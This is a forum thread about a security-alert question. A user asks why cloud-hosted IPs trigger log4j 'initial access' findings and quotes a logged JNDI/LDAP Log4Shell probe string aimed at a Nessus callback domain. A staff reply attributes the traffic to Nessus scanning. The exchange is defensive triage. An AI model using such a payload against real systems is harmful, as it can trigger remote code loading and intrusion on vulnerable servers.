Skip to main content
Question

SCC threat finding - Initial access: log4j compromise attempt

  • July 8, 2026
  • 1 reply
  • 14 views

arv261095
Forum|alt.badge.img+5

Hi Team anyone has any idea on what this low sev SCC findings are actually i am very much confused as most of them are having source IPs as AWS and Google and generating lot of noise also the url contains nessus so not sure why a google / AWS source IP would trigger this :

E.g : 

Source IP

100.27.42.240 


      "refererUrl": "${jndi:ldap://log4shell-generic-lQr0LA9voF9PHEyop2C6${lower:ten}.w.nessus.org/nessus}"


and these are generated daily via multiple different AWS and Google IPs as source 
 

 

1 reply

gary_nation
Staff
Forum|alt.badge.img+1

That looks like someone running a nessus scan from AWS and Google VM’s.  If you dont recognise the IP’s as authorised scans then report this as abuse:
https://support.google.com/code/contact/cloud_platform_report?hl=en